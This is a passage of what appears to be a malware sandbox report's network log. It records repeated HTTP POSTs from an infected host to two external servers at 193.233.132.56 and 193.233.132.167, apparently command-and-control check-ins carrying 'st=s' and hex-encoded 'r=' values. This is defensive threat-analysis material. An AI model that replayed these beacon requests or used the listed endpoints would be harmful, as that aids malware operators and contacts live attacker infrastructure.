                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:54.718034029 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:54 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1512192.168.2.551368193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:54.589934111 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:54.839196920 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:54 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1513192.168.2.551369193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:55.059140921 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:55.307837963 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:55 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1514192.168.2.551370193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:55.090743065 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:55.338251114 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:55 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1515192.168.2.551371193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:55.567786932 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:55.823369980 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:55 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1516192.168.2.551372193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:55.668411016 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:55.916929007 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:55 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1517192.168.2.551373193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:56.167634964 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:56.415338993 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1518192.168.2.551374193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:56.172810078 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:56.425393105 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1519192.168.2.551375193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:56.669473886 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:56.921344042 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1520192.168.2.551376193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:56.761064053 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:57.007370949 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1521192.168.2.551378193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:57.261265993 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:57.514024973 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:57 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1522192.168.2.551377193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:57.261392117 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:57.510546923 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:57 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1523192.168.2.551379193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:57.762088060 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:58.015448093 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:57 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1524192.168.2.551380193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:57.838288069 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:58.086596966 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:57 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1525192.168.2.551381193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:58.338505030 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:58.591551065 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:58 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1526192.168.2.551382193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:58.351716995 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:58.599088907 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:58 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1527192.168.2.551383193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:58.852525949 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:59.106630087 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:58 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1528192.168.2.551384193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:58.913249016 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
